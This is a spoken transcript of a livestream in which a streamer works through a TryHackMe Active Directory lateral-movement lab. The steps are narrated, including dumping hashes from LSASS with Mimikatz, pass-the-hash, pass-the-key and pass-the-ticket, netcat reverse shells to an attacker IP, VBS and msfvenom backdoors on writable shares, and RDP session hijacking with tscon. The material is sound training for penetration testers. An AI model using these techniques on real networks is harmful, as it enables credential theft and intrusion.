exploit an actual network using a few different methods. So you're going to watch me learn this live. And what I mean by that is I have not gone through this. I did the first 4 tasks live last night. We're going to hopefully finish the remaining 4 tasks live tonight. So I'm learning it as I go, so you can watch me stumble through it. You can watch me make silly mistakes. You can watch me yell at my computer, and you can have the full learning experience. With that being said, I'm going to go ahead and share my screen with you guys, and I'm going to get Twitch pulled up on the side just so I can monitor the chat. What up, Nate? Nate's here as well. See if anyone's on Discord. I don't think anyone is in my room on Discord. So that's the other part of it. If you are on the Work Smarter Discord server, you can join me on there in the box hacking channel, and then you can voice chat if you want. And someone, when I posted I was going live, someone said, I'm confused. Tyler and Nate share Twitch, and it is true. We are co-parents of this Twitch channel. So sometimes you'll see me, sometimes you will see Nate. But let's go ahead and dive into this. We did tasks 1 through 4, and just for clarity, what I have done up to this point is I connected to the VPN. So just know that if you are doing a network on TryHackMe, you cannot use your normal TryHackMe VPN. You have to download a different configuration file for that specific network. So I've done that. And the other thing I've done is I have added the domain controller to my DNS settings on here. You have to do that just to be able to resolve things properly. So what you do is just grab the domain controller IP, throw it on here, save it, and then you run a command, systemctl restart network manager. I'm not going to do it because I already did that. But once you update the DNS, you do that, and then you should be connected to the network and ready to rock. But the first part is a wall of text. So I'm going to read to you a bedtime story. Hopefully it doesn't actually put you to bed, but we're going to dive into this and we will learn it together. So you can see what we've already covered. We're going to talk about the use of alternate authentication material. Let's dive into it. Just checking any notifications over here. Okay. Nate knows the pain of having so many things pulled up that you try to make sure everything is good to go. All right, let's dive in. By alternate authentication material, we refer to any piece of data that can be used to access a Windows account without actually knowing a user's password itself. This is possible because of how some authentication protocols used by Windows networks work. In this task, we will look at a couple of alternatives available to log in as a user when either of the following authentication protocols is available on the network: NTLM authentication and Kerberos authentication. Maybe we'll be able to do some Kerberosting today. During this task, maybe pass the hash as well. During this task, just reading Nate's comments. For those of you on YouTube, he said, yeah, it's impossible to track all the windows. That's why I don't mind kicking back like this on your night of custody. I have custody of our child this evening. That's good. During this task, you are assumed to be familiar with the methods and tools to extract credentials from a host. Mimikatz, we've used that. We used it on the infamous throwback network that Nate somehow finished. Mimikatz will be used as a tool of choice for credential extraction throughout the room. NTLM authentication. Before diving into the actual lateral movement techniques, let's take a look at how NTLM authentication works. And let me just encourage you, when I was first getting into these things, I would skim all of this and wouldn't look at it closely. Slow down when you are learning, and slow down when you're doing a room on TryHackMe. The goal is not to get as much points as possible as quickly as you can. The goal is to learn, right? So take it slow. I think that's a good idea. So let's look at this. We have our NTLM hash plus challenge plus response. So our client is going to send an authentication request to our server, right? So that could be like this web server, whatever it is, to the server. The server is going to issue an NTLM challenge. We're going to give an NTLM response, and you can see it's based on our hash challenge response. And then what the server is going to do is send that challenge and response together to the domain controller, and it's going to essentially see, is this legit? Should we allow them in? So they're going to allow or deny authentication to the server, and the server passes that on to us. I'm not going to read through this because I just explained that. The described process applies when using a domain account. If a local account is used, the server can verify the response to the challenge itself without requiring interaction with the domain controller, since it has the password hash stored locally on its SAM. It's kind of like the Etsy shadow on Linux. Pass the hash. As a result of extracting creds from a host where we have attained administrative privileges by using Mimikatz or similar tools, which I think CrackMap exec might to that as well. We might get clear text passwords or hashes that can be easily cracked. However, if we aren't lucky enough, we will end up with a non-cracked NTLM password hash. Although it may seem we can't really use those hashes, the NTLM challenge sent during authentication can be responded to just by knowing the password hash. This means we can authenticate without requiring the plain text password to be known. Instead of having to crack NTLM hashes, if the Windows domain is configured to use NTLM authentication, we can pass the hash and authenticate successfully. To extract NTLM hashes, we can either use Mimikatz to read the local SAM or extract hashes directly from the LSAS memory. Extracting NTLM hashes from local SAM. This method will only allow you to get hashes from local users on the machine. Okay, that's important. No domain users will be available. So we'll probably do this in practice, but you can kind of see what we're doing here. When you first launch Mimikatz, you always have to run that. We have token elevate. We're doing LSA dump with the SAM file. I already explained it up there. We got the RID, the user, and then the hash. So if we can't crack the hash, we can pass the hash. Extracting NTLM hashes from LSAS memory. This method will let you extract any NTLM hash for local users and any domain user that has recently logged onto the machine. All right, so very similar. This stuff's the same right there. I'm gonna mess up how to say that. Secursa. We're gonna say it like that. URLsa. Say it however you want. We got the authentication ID, session, username, domain. So this is doing the actual domain. So this will extract any domain user. That's the difference if you didn't catch that. We got Bob Jenkins, the domain, the logon server, logon time, blah, blah, blah. There's our username and there's the hash that we're looking for. We can use the extracted hashes to perform a pass the hash attack by using Mimikatz to inject an access token for the victim user on a reverse shell or any other command you like as follows. Token revert. Here is our syntax. So you can see we're taking the user, we're specifying the domain, we're specifying the NTLM hash, then we're running, and we can run anything there as that user. Hopefully that the NTLM will authenticate. And it looks like here what we're doing is we're using netcat to spawn a reverse shell, because you can notice we're launching command.exe. Attacker IP is going to be the IP of our Kali Linux machine. That's the port our Kali Linux machine is listening on with NC, and VLP, and it should give us that shell. Notice we use token revert right there to reestablish our original token privileges, as trying to pass the hash with an elevated token won't work. Good to know. This would be the equivalent of using run as net only, but with the hash instead of a password, and we'll spawn a new reverse shell from where we launch any command as the victim user. If you were here last night, or if you catch it on YouTube, the previous stream, Amoeba Man, who created many of these networks, explained that in a little more detail. To restore the reverse shell, we should run a reverse listener on our attack box. We're not using attack box, we're using our own VM, but it's the same syntax. Interestingly, if you run the who am I command on the shell, it will still show you the original user you were before doing pass the hash, but any command run from here will actually use the credentials we injected. That is what Amoeba Man explained to us yesterday on stream, because I did a run as and I said who am I, and I was like, man, I'm still the original user, it must not have worked. And he explained because of this net only flag, that's why it happened. So it must be a similar process with this. Passing the hash using Linux. If you have access to a Linux box like your attack box, several tools have built-in support to perform pass the hash using different protocols. Depending on which services are available to you, you can do the following. Connect to RDP. I don't like using RDP, but it looks like we can pass the hash with X-free RDP. That's cool, I didn't know that. Connect via PS exact. So we're running PS exact hashes, we're specifying the hash, the domain, the user, and then the IP of the machine we're connecting to. And then only the Linux version of PS exec supports pass the hash. And then evil win RM, this is what we used on the throwback network a lot, if I remember right. We have evil win RM -I, then we're going to specify the victim IP, the username -h, and then we can throw the hash in there. That's the one I have the most experience using. Kerberos authentication. Let's take a quick look at how Kerberos authentication works. It's the three-headed dog. So we'll learn about the three-headed dog. The user sends his username and a timestamp encrypted using a key derived from his password to the key distribution center, a service usually installed on the domain controller in charge of creating Kerberos tickets on the network. The KDC, or the Key Distribution Center, will create and send back a ticket granting ticket. So try to keep these straight because it's good just to memorize those. Allowing the user to request tickets to access specific services without passing their credentials to the services themselves. Along with the ticket granting ticket, a session key is given to the user which they will need to generate the requests that follow. Notice the ticket granting ticket is encrypted using the KRBTTG account's password hash. And that's how you get a golden ticket, if you can get the password hash and keys so the user can't access this content. It's important to know that the encrypted ticket granting ticket includes a copy of the session key as part of its contents, and the KDC, or Key Distribution Center, has no need to store the session key, as it can recover a copy by decrypting the ticket granting ticket if needed. And it looks like this is just giving us a diagram of what we just talked about, so I'm not going to re-explain this. It explains it up there. When users want to connect to a service on the network like a share, website, or database, they will use their ticket granting ticket to ask the Key Distribution Center for a ticket granting service. Ticket granting services are tickets that allow connection only to the specific service for which they were created. To request a ticket granting service, the user will send his username and a timestamp encrypted using the session key, along with the ticket granting ticket and a service principal name, which indicates the service and server name we intend to access. Cool. Drink of water. As a result, the Key Distribution Center will send us a ticket granting service and a session service key, or a service session key, I'm mixing words around, which we will need to authenticate to the service we want to access. The ticket granting service is encrypted using the service owner hash. The service owner is the user or machine account under which the service runs. The ticket granting service contains a copy of the server's session key on its encrypted content so that the service owner can access it by decrypting the ticket granting service. Okay, that's just confusing even to read. So we have our client, session key, ticket granting ticket. We request our ticket granting service by including these things to the domain controller. The domain controller responds to the ticket granting service and our service session key back to us. The ticket granting service can then be sent to the desired service. Remember, it's only a specific service to authenticate and establish a connection. The service will use this configured account's password hash to decrypt the ticket granting service and validate the service session key. That's a little more straightforward. Pass the ticket. Sometimes it will be possible to extract Kerberos tickets and session keys from LSAS memory using Mimikatz. The process usually requires us to have system privileges on the attack machine and can be done as follows. So, tickets, export. Notice if we only had access to a ticket, but not its corresponding session key, we wouldn't be able to use that ticket. Therefore, both are necessary. So we need a ticket and session key. Got it. Well, Mimikatz can extract any ticket granting ticket or ticket granting service available from the memory of the LSAS process. Most of the time, we'll be interested in ticket granting tickets, as it can be used to request access to any service the user is allowed to access. At the same time, ticket granting services are only good for a specific service. Extracting a ticket granting ticket will require us to have admin creds, and extracting ticket granting services can be done with the low priv account, only the ones assigned to that account. Once we have extracted the desired ticket, we can inject the tickets into the current session with the following command. Just looking through this. Is it the SID? Injecting tickets in our own session doesn't require admin privs. After this, the tickets will be available for any tools we use for lateral movement. To check if the tickets were correctly injected, you can use the klist command. So this is with a shell or an SSH connection. Klist, current login ID, and it's going to show us our different tickets. So on here, we see the client, we see the server encryption type. Cool. Overpass the hash and pass the key. Spoiler alert, I believe there is a series on TryHackMe called Overpass, so you can kind of think through why it's called Overpass. This kind of attack is similar to pass the hash, but applied to Kerberos networks. When a user requests a ticket granting ticket, they send a timestamp encrypted with an encryption key derived from their password. The algorithm used to derive this key can be either DES, disabled by default on current Windows versions, RC4, AES 128, AES 256, depending on the installed Windows version and Kerberos configuration. If we have any of those keys, we can ask the key distribution center for a ticket granting ticket without requiring the actual password, hence the name Pass the Key. We can obtain the Kerberos encryption keys from memory by using Mimikatz with the following commands. Depending on the available keys, we can run the following commands in Mimikatz to get a reverse shell. Gosh, I forgot to start my timer. Hold up. Usually we work for 25 minutes and take a 5-minute break, so we're gonna work extra long because I always forget to start my dumb timer. All right. We can obtain blah, blah. Depending on available keys, we can run the following commands in Mimikatz to get a reverse shell. Okay, cool. It's already on the jump. Sweet. So if we have the RC4 hash, we're specifying our user, our domain, our hash, running. Okay, easy enough. So it looks like we're just changing this right here to specify the encryption of the hash, right? Everything else seems to be the same. Notice that when using RC4, where are we at? RC4, the key will be equal to the NTLM hash of a user. Okay, this means that if we could extract the NTLM hash, we can use it to request a ticket granting ticket as long as RC4 is one of the enabled protocols. This particular variant is usually known as Overpass the Hash. To receive the reverse shell, we would be able to run a reverse shell listener on our attack box. Just as with Pass the Hash, any command run from the shell will use credentials. Let's get to work. Let's do it. Put your hoodie on. All right. I managed to get my hoodie on over my headphones. I don't know how I did that, but that's a win. That's a win for the night. All right, this kind of attack is similar to Pass the Hash, but applied to Kerberos networks. Oh, wait, I already read this. Let's get to work. There we go. To begin this exercise, we will need to connect to the jump box using the following creds. So let's go ahead and give that a shot. Looks like we're a tier 2 admin now. And you can always copy and paste. I like to type because it just helps me remember syntax and helps me make errors. And often one of the best ways to learn is making errors. My hood's too hot to have on, so we're gonna take that off. Now I'll probably fail. My SSH connection won't work. Okay, very secure password, ILOV3THM exclamation mark. We're hackers. These creds will grant you admin access to the jump box, allowing you to use Mimikatz to dump the authentication material needed to perform any of the techniques presented during this task. Using your SSH session, use Mimikatz to extract authentication material and perform Pass the Hash, Pass the Ticket, or Pass the Key against domain user T1 Toby Beck. Once you have a command prompt with this creds loaded, use WinRS to connect to a command prompt on THM. Okay. So let's give it a shot. I think if we go to C, there might be some tools here. And there's Mimikatz right there. That's what I was thinking. So we can do, I think we can use any one we want. So maybe we'll do a few of them. Let's just begin with Pass the Hash. All right, so if you scroll up, Pass the Hash. Run it. Okay, and remember, if you do privilege, if I can spell, debug, privilege, okay, that's good. And we're going to do token elevate, and we want to get trying to remember. The only annoying thing about this is scrolling down. So using your SSH session, use Mimikatz to extract authentication material and perform Pass the Hash, Pass the Ticket, or Pass the Key. So I'm not sure if we can get it from the local account. I guess it depends if he is logged in. Otherwise, we'll have to do it a little bit differently. So let's just first try this first command right here. So we already did token elevate, and you can see we're impersonating NT authority system. Let's try LSA dump SAM and just see what happens. Okay, so it's not dumping the account that we need, of course, because it's just doing the local accounts on the computer. So what we're gonna try is this right here. So if we do sec, however you say that. Hey, that looks a little bit better for us. So if we look through here, let's scroll up, scroll up, scroll up. There's us. Then there's Toby Beck, right? So we have his NTLM hash right there. Let's go ahead and copy that. I'm gonna pull up my terminal just so we can record this. CD, did I call this pivoting? Yep, I did. And we're just gonna echo, what was the account name? Let's scroll down. Let's echo T1 Toby.Beck and then his hash like that. And we'll call it Toby_hash.text. Okay, so we have Toby Beck's username, and now we have his hash. So now what we want to do is go ahead and try to get a reverse shell. And we should be able to use Mimikatz to do that as well. So if we scroll up, see if I can remember where it was at. So we just did this, we used that. And now we're gonna see if we can go ahead and get a reverse shell. So we'll just follow this 5555 port. So netcat MVLP 5555. So we are listening on that machine. And then over here, let's go ahead and scroll down to the bottom. If we do token revert like that, and then sec URLSA pass the hash, user is going to be T1 Toby Beck. Let's just copy that. T1 Toby Beck. And then our domain is going to be za.tryhackme.com. And I think it's just a space. NTLM. Whoops, let's try to do this right. NTLM like that, and then we're going to copy in the NTLM hash that we were able to grab. We could always try to crack the hash as well, but since we're supposed to pass the hash, let's try that. Okay, we got NTLM hash there, and now run. And what we want to run, of course, is a command prompt. So C tools, oops, netcat64.exe. And if that wasn't already on your victim, you may have to upload that with like a Python web server, insert util or something like that, or invoke web request with PowerPoint -e cmd.exe. And now we want to grab our attacker IP. I'm going to name this Toby just in faith that we're going to get a shell. Our attack IP is there, but we can do lateral movement. I don't know if it actually worked that way. We might actually have to do it this way. Our attack IP, and then port 5555. And then close our quotation. I'm just looking over my syntax, seeing if I did that right, seeing if there's any obvious typos. You guys probably see something, you know it's gonna fail, and you're just gonna laugh at me, but that's okay. Let's give it a shot. So remember, we are on, but it still shows our Felicia Dean user, but any command we run is going to be run as Toby. Remember that. If you do who am I and you're wondering why it's not working. There was a command that Amoeba Man told me last night that you can verify you got logged in. I don't remember what that command was. So we're just going to say on faith we have it right. Plus we're using a hash this time, and I copy and pasted the hash, so we should be good. Anyways. Blah blah. So we did a pass the hash attack first. Once you have a command prompt with his credentials loaded, use WinRS to connect to a command prompt on THMIS. Okay, so winrs.exe-r, and I couldn't get this to work last night with the actual name, so I'm just going to specify the IP of that server, which is 10.200.80.201. Scroll all the way back down. Okay. And then we're just launching a command prompt like that. WinSRXC-R the IP and command. Cannot process requests. Default authentication may be used with an IP address under the following conditions. Oh, so maybe I do have to try to specify it the other way. Okay, we'll give it a shot. Come on, TryHackMe. This is the issue I was getting every time last night I tried to hit this. So, no, I couldn't do it that way. So again, if I edited my Etsy host file, if we... Can I manually add it on like a local machine? Let's just read through here because I think we may have to fix it this way. So if we do like IP config display DNS, something like that. So you can see we're connected to this, but it doesn't seem to resolve properly for that web server. Can we add entries to see your DNS settings? Okay, to open your computer's host file, I can't do that. I don't have a GUI connection to it. University NS lookup. Huh. Well, that sucks. Just gonna try it again. Maybe I typed something wrong. I'll copy it exactly what's here. Oh! Freaking worked that time. Did I type it wrong? The first time? WinRS.exe-R THMIS.ZA.TryHackMe.com. No, I'm pretty sure I typed exactly the same. Hey Nate, if you're following along, let me know if it worked for you. I'm just curious. But we got it, so that's cool. You'll find a flag on T1 Toby's desktop on THMISS. Cap. Whoa. Flag.exe, so we just need to run that. No password needed. We successfully performed pass the hash, my friends. Good deal. I got a notification on Discord. I'm just gonna check Discord real quick. What is my notification on here? Jack saying go watch my live stream. Darn right. Better come watch my live stream. All right. Let's keep moving. Well, we could, you know, for the sake of learning, we could go back and try to do a pass the ticket attack now if we wanted to. You know, because it said use pass the hash, pass the ticket, or pass the key. We could try all of them just for fun, right? Let's try that. So if we go back to our Mimikatz, here's pass the key. So we already did privilege debug. Let's do sec urlsa e keys. It's freaking out. Okay. All right. Depending on the available keys, we can run the following commands in Mimikatz. Okay, I'm gonna make this big. Oh, that's not gonna fix it, so it's gonna look bad. So I see we have RC4, so we just need to find our user. If my scroll would work. Come on. Probably gonna miss the user. There's Felicia. Bye, Felicia. Isn't that a meme? I think so. Hey, there's Toby. So we have RC4 right here. So let's go ahead and grab this. Go to our Kali Linux box. Switch user to root. TryHackMe, CD, pivoting, and echo let's see, I don't remember his name. So let's go ahead and cat Toby hash just so I can see his name. And now we're gonna echo T1 Toby.back. And we'll echo that and we'll call it Toby RC4.text. Okay, cool. And now let's get this pulled back up to our side-by-side view. Whoops, went to my other monitor. Give Callie more room. Okay, so we have an RC4 hash. We need to set up another listener. So let's go ahead and do that over here. We're going to use netcat and VLP, and we'll use 555. Whoops, what the heck? Yeah, I don't know why it was doing EEE. If I turn off numlock, does it do that? Oh, okay, whatever. Weird. 5556. So we have our listener, and now we should be able to do the sec. Okay, that's broken. There we go. Sec URLSA, pass the hash. Oh, it's all one command. Pass the hash. User is going to be T1 Toby Beck. Go ahead and just copy that. T1 Toby Beck. Our domain is going to be the same as before, za.tryhackme.com. RC4 is our hash, so we'll do RC4. Of course, if it was a different hash, you would specify it there. So we do have RC4. Let's paste that in, and then we're going to run our same command prompt. See if I make any typos. Tools, netcat64.exe-e cmd.exe, our attacker IP, which you would think I remember it, but I don't. And then we did 5556. And we're still going to be our other user, but any commands we run will be run as Toby. At least they should. And we could, I don't know if we do another shell to that, if it will kick us off, but you know, just for proof of concept, we can test that to see if I was really going crazy or if it just works intermittently. Oh, it worked. Okay. So we did pass the hash, pass the ticket, and now let's pass the key. Oh, I did pass the key. That's what we did. We need to pass the ticket. So let's scroll up. Pass the ticket. I kind of went a little bit out of order, but let's go ahead and try that. I'm just going to exit this one out. And we'll use that again for our Toby shell. So pass the ticket. We already did privilege debug, so sec URLSA tickets export. Just looking at that. So we need to find the ticket, which, you know what I'm gonna do? Let's do this a little bit differently. If I maximize this and then run it, will it make it cleaner? No, it's stuck to like what the setting was. Yo, what up, Wilbur? Good to have you. We already completed like this part. I'm just doing every single attack method you can do. So we did pass the hash, pass the key. Now we're doing pass the ticket. And then I'll finally move on to the next part. But of course, you don't have to do all these steps. But like I said, the goal is to learn. And if you can do it each one of these ways, I think it's a good idea to at least try it. See if we can get it to work every single way. Gosh, this is so sloppy. Just because of the way I have to always minimize it. T1 Toby back. TryHackMe. So I see we have the session key here, and we have the ticket. I'm just not quite sure. Oh, I see. I got it. Whoops, that's not what I want to do. Oh, it did not just scroll back down. You stupid cat. It's always a freaking cat, right? Almost there. Did I miss it? We got 5 minutes left, y'all. Well, not 5 minutes for the stream. 5 minutes for our first break. Let's go ahead and grab this hash, though. Or this ticket. So we need a copy. Just look at the context here. So it's all of this right here. That's the ticket. So let's echo first. Let's actually do it on this one because I'm already logged in as root, already in the folder. So if we echo t1 toby.back, that, oh, I see, we're gonna run an issue. Escape. Is this the escape one? I don't know. I don't remember what the escape key is. That's probably not gonna work. Well, that wasn't what I meant to do. Here, let's go like this. gedit toby ticket.text. We can do it this way as well. The format's really messed up, huh? There we go. I think that's correct. Let me glance at this. 0 to tryhackme.local.kirby or tryhackme ZA. Okay, that looks correct to me. Okay, so we have that there. We'll do 5557 this time. And we can inject it, so it's just with this command right here, eh? Okay. Scroll. They see me scrolling. They hating. What is going on? Stop. Okay. Kerberos PTT, and then we're copying that from here. Oh, we're not making a shell. We're just doing it in our own session. I didn't have to even set up a netcat listener. Copy that. Jump over to our shell. And so, does that look right? That didn't work. Kerberos P. Oh, I had my syntax wrong there. Let's try that again. Error. Something file. Something read data. Something. Let's just look at this. So if we look at theirs, it all looks correct. Only thing I notice that's different is there's a dash here. Okay, so if that worked, oh, it worked. You can see it right there. We were able to Steal the ticket, or steal the, yeah, pass the ticket. Okay, we did every single one. We were able to pass the hash, pass the ticket, and pass the key. So we tried every method that we learned about thus far. Our 5-minute break starts in 20 seconds, so we can maybe take our 5-minute break before stepping into task 6. So I'm gonna stop our timer. Let's go ahead and take a 5-minute break, and I'll be back on here. I'm gonna get up from my desk, walk around. I encourage you to do so as well. We'll be back in 5 minutes. Boom. What is up, everyone? I just got back, like right when it hit 0. So let's go ahead and dive back into things. And actually, what I want to do, let me share my screen. What I'm going to do before we move on is note taking is important, and I have a section on here for Pass the Hash. But honestly, this is really helpful. I like how easily they explain these different attacks. So I'm going to take the time and just copy some of these things to my personal notes. And I think I want everything up here for now. So this is for Pass the Hash. Let's just grab that. See how well it copies over to OneNote here. And it copied over terribly. That's good. That is good. So what we want to do is, you know how I want to do this. If I pull this out, this is why OneNote isn't awesome. Sometimes it copies over this stuff. Oh, it looks like I took a screenshot of that. So we can do that if we, I think this is, if we go back to here, I'm just gonna grab a screenshot of this. No domain users. This will allow you to get, okay, perfect. So let's grab that in there. The other one is here. Come on. Why is it highlighted? Stop being highlighted. The machine. And let's grab this. Drop that there. And then one more. Let's grab that one. And so that was Pass the Hash. I might just leave it at that. I might come back on my own time and I might grab the other ones. But for now, we'll just do Pass the Hash there. I'll probably grab Pass the Ticket and Overpass the Hash and all that stuff. But for now, let's just do that just so we have it saved in our notes. And if you haven't already, I would encourage you to do the same, so you have some of these things in your notes as well, because this stuff will come up more often. Okay, let me close my notes out and let's go to abusing user behavior. Under certain circumstances, actually, before we dive into it, let me get Twitch pulled up on one side. Let me restart our 25-minute timer. And it is time to work. All right, under certain circumstances, an attacker can take advantage of actions performed by users to gain further access to machines in the network. While there are many ways this can happen, we will look at some of the most common ones. Number 1, abusing writable shares. It is quite common to find network shares that legitimate users use to perform day-to-day tasks when checking corporate environments. If those shares are writable for some reason, an attacker can plant specific files to force users into executing any arbitrary payload and gain access to their machines. One common scenario consists of finding a shortcut to a script or executable file hosted on a network share. Yep, that would make sense. The rationale behind this is that the administrator can maintain an executable on a network share, and users can execute it without copying or installing the application to each user's machine. If we as attackers have write permissions over such scripts or executables, we can backdoor them to force users to execute any payload we want. Very cool. Although the script or executable is hosted on a server, when a user opens the shortcut on his workstation, the executable will be copied from the server to its temp folder and executed on the workstation. Therefore, any payload will run in the context of the final user's workstation and logged in user account. Backdoor and VBS scripts. As an example, if the shared resource is a VBS script, we can put a copy of netcat64 and inject the following code. So we're creating an object, wscriptshell.run, and then we're just using the syntax, as you can see, just to grab netcat64.exe, it's saving it to temp, and then we're running it to create a reverse shell. I just explained that. Backdooring.exe files. If the shared files is a Windows binary, say putty.exe, You can download it from the share and use MSF Venom to inject a backdoor into it. The binary will still work as usual, but execute an additional payload silently. To create a backdoored putty.exe, we can use the following commands. So it's your standard MSF Venom. I have an iPad going off on this table over here. I'm going through labs on Intune at work, and so I have an iPad that I enrolled in my own organization. I think it finally grabbed the iPad. It just said you've been enrolled, so that's cool. That was only a few hours late. Thank you, Microsoft Intune. All right, I got distracted. Blah blah. So it's your standard MSF Venom. It looks like here, but we're actually editing putty.exe. Okay, cool. The resulting putty.x.exe will execute a reverse TCP interpreter payload without the user noticing it. Once the file has been generated, we can replace the executable on the Windows share and wait for any connections using the exploit multi-handler. Sweet. RDP hijacking. When an administrator uses remote desktop to connect to a machine and closes the RDP client instead of logging off, his session will remain open on the server indefinitely. If you have system privs on Windows Server 2016 and earlier, you can take over any existing RDP session without requiring a password. If we have an administrator level access, we can get system by any method of our preference. For now, we will use psexec to do so. First, let's run a command.exe as administrator. So this is kind of in the GUI here. From there, run psexec64.exe, available at tools. To list the existing sessions on a server, you can use the following command, query user. According to the command output above, if we were currently connected via RDP using the administrator user, our session name would be RDP TCP6. You see that right there. We can also see that a user named Luke, come on Luke, has left a session open with ID 3. Any session with a disk state has been left open by the user and isn't being used at the moment. While you can take over active sessions as well, the legitimate user will be forced out of a session when you do, which would kind of be noticed. To connect to a session, we will use tscon.exe and specify the session ID. So it looks like we're taking over tscon. We're taking over the admin. Okay. As well as our current session name. Following the previous example, to take over Luke's session. If we were connected to our administrator user, I see, we'd use the following command. Okay, that makes sense. In simpler terms, the command states that the graphical session 3, owned by Luke, should be connected with the RDP session, that one owned by the admin user. As a result, we'll resume Luke's RDP session and connect to it immediately. Windows Server 2019 won't allow you to connect without knowing its password. That's probably a good thing. Let's get to work. Let's do it. To complete this exercise, you'll need to connect to Jump using a new set of creds obtained from there. Notice that the link is different from other tasks. Okay, well, let's go ahead and do that. So let's exit this. We're done with that, it would appear. I assume we're done with Toby as well. Oh, we already exited out of Toby. Okay, I think it did it for us. It kicked us off. I really hope our network didn't die. But if it did, we'll work with it. Let's go ahead and copy this. Maybe I should check the network real quick. What are we doing on time? Ooh, can I extend? You can only extend it for a maximum of 2 hours. Well, there's only 27 minutes left, so I guess we can't extend it. That's awesome. Let's scroll back down. Okay, let's get to work. So let's grab this link. Open up Firefox. If the network died, this won't work. Okay, cool. T2 admin. Sweet. Okay. Once you have your creds, I don't want to use RDP, but okay, we can. We'll try a free RDP. Usually I use Remina, but we'll do this. vthm jump 2.za.tryhackme.com/u. Our user is T2 Kelly Blake. and /p, whoops, our password is actually something I'm not going to type. It's our password. Do you trust their certificate? Yeah. This is gonna get fun now. Having this pulled up here. I mean, it might work okay. Okay. For this task work on hijacking RDP session, if you are interested in trying backdoor exe or other files, you can find some exercise about this in the Windows local persistence room to be released soon. Please, Amoeba Man. Follow the instructions to hijack Toby Beck. We're going to hijack Toby Beck again. Let's do it. When executing query session, you'll see several users named T1 Toby Beck followed by a number. These are just identical copies of the same user, and you can hijack any of them. All right, Grand Theft Auto on here. Make sure you hijack a session marked as disconnected to avoid interfering with other users, or we just kick every other user on the network off on stream. So TryHackMe bans me. Yeah, we won't do that. Okay. Remote desktop licensing is not configured. Come on. All right, RDP hijacking. So first, command prompt, CMD, run as admin. Yes. All right. So far, so good. Can we make this bigger? Just so you guys can see it a little better if I do 20. I can even make it a little bit bigger. Font, let's do 24. There we go. See it a little bit better, although it goes off the screen a little bit. There we go. All right, from there, we need to go to our C folder. CD tools, I think. Dir. Did I screw it up by making it like that? Oh well. So if we do tools, there's ps exec right here. Let's just try it. ps exec 64.exe.s cmd.exe. Is that what I'm supposed to do? Okay. Agree. To list the existing sessions on a server, you can use query user. And there's us. We're Kelly Blake. Okay. And so we're going to use this tool, tscon. We want to take over any one of those. We just want to make sure it's in a disconnected state, which they all are right now. So we'll do 2 and then DST. And now we're going to specify ours, which is this information right there. RDP, TCP, 38. Look at that. We did it. THM. Nice wallpaper. Thanks. Port forwarding. We're making it through, y'all. Network's gonna die, but you know what? We're making it through. I'm gonna try it one more time. Gosh. Whatever. Can I close this out? I'd assume I can. If we need to reopen it, we can. All right, port forwarding. Most of the lateral movement techniques we have presented require specific ports to be available for an attacker. In real-world networks, the administrators may have blocked some of these ports for security reasons or have implemented segmentation around the network, preventing you from reaching SMB, RDP, WinRM, or RPC ports. To go around these restrictions, we can use port forwarding techniques, which consist of using any compromised host as a jump box to pivot to other hosts. It is expected that some machines will have more network permissions than others, as every role in a business will have different needs in terms of what network services are required for day-to-day work. SSH tunneling. The first protocol we'll be looking at is SSH, as it already has built-in functionality to do port forwarding through a feature called SSH tunneling. While SSH used to be a protocol associated with Linux systems, Windows now ships with Open SSH client by default, so you can expect to find it in many systems nowadays, independent of their OS. SSH tunneling can be used in different ways to forward ports through an SSH connection, which we'll use depending on the situation. To explain each case, let's assume a scenario where we've gained control over the PC1 machine. I think that, oh, that's right here. It doesn't need to be administered to access, and would like to use it as a pivot or like a jump box to access a port on another machine to which we can't directly contact. So we want to access this port, it would appear. We will start a tunnel from the PC1 machine, right there, acting as an SSH client to the attacker's PC, which will act as an SSH server. The reason to do so is that you'll often find an SSH client on Windows machines, but no SSH server will be available most of the time. Since we'll be making a connection back to our attacker machine, we'll want to create a user in it without access to any console for tunneling and set a password for creating the tunnels. Okay, I see. So we'll have to do this. Depending on your needs, the SSH tunnel can be used to do either local or remote port forwarding. Let's take a look at each case. SSH remote port forwarding. They said, why the bug still? I wonder if the time in browser is just off. Try refreshing the page and see if the timer updates. Good idea. Let me try that. Yeah, because look, I feel like it's a bomb. It's going to explode in 19 minutes. Hey, good call, Nate. So we're at an hour and 19 minutes. It's not going to time out on us. That makes me feel less stress. All right, SSH remote port forwarding. In our example, let's assume that firewall policies block the attacker's machine from directly accessing port 3389. Okay, if the attacker has previously compromised PC1, and in turn PC1 has access to port 3389, it can be used to pivot to port 3389 using a remote port forwarding from PC1. Remote port forwarding allows you to take a reachable port from the SSH client, in this case PC1, and project it into a remote SSH service, the attacker's machine. As a result, the port will be open in the attacker's machine that can be used to connect back to port 3389 in the server through the SSH tunnel. PC1 will, in turn, proxy the connection so that the server will see all the traffic as it was coming from PC1. It sounds kind of like the proxy chains we were doing on Throwback. A valid question that might pop up by this point is why we need port forwarding if we have compromised PC1 and can run RDP session directly from there. The answer is simple. In a situation where we only have console access to PC1, we won't be able to use any RDP client as we don't have a GUI. By making the port available to your attacker's machine, you can use a Linux RDP client to connect. Similar situations arise when you want to run an exploit against a port that can't be reached directly, as your exploit may require a specific scripting language that may not always be available at machines you compromise. Oh, interesting. Referring to the previous image, to port 3389 on the server back to our attacker's machine, we can use the following command on PC1. So this is on PC1. SSH tunnel user, that's the user we created in our attack PC, IP-R, there's what we're trying to attack, IP-N. This will establish an SSH connection from PC1 to 101, the attacker PC, using the tunnel user. Since tunnel user isn't allowed to run a shell on the attacker PC, we need to run the SSH command with the -N switch to prevent the client from requesting one, or the connection will exit immediately. Okay, the R switch right there is used to request a remote port forward, and the syntax requires us first to indicate the port will be opening at the SSH server, followed by calling, and then the IP and port of the socket will be forwarding. Notice that the port numbers don't need to match, although they do in the example, so we can do any port to connect to 3389. The command itself won't output anything, but the tunnel will depend on the command to be running. Whenever we want, we can close the tunnel by pressing Ctrl+C, as with any other command. Once our tunnel is set and running, we can go to the attacker's machine and RTP into the forwarded port to reach the server. Okay, that makes sense in my head. Cool. SSH local port forwarding. Local port forwarding allows us to pull a port from an SSH server into the SSH client. In our scenario, this can be used to take any service available in our attacker's machine and make it available through a port on PC1. That way, any host that can't connect directly to the attacker's PC but can connect to PC1 will now be able to reach the attacker's services through the pivot host. Using this type of port forward would allow us to run reverse shells from hosts that normally wouldn't be able to connect back to us, or simply make any service we want available to machines that have no direct connection to us. Very cool. To forward port 80 from the attacker's machine and make it available from PC1, we can run the following command on PC1. SSH tunnel user -L, is that like a listener maybe, on port 80, local address port 80-N, so it doesn't open a shell. The command structure is similar to the one used, but L is for local 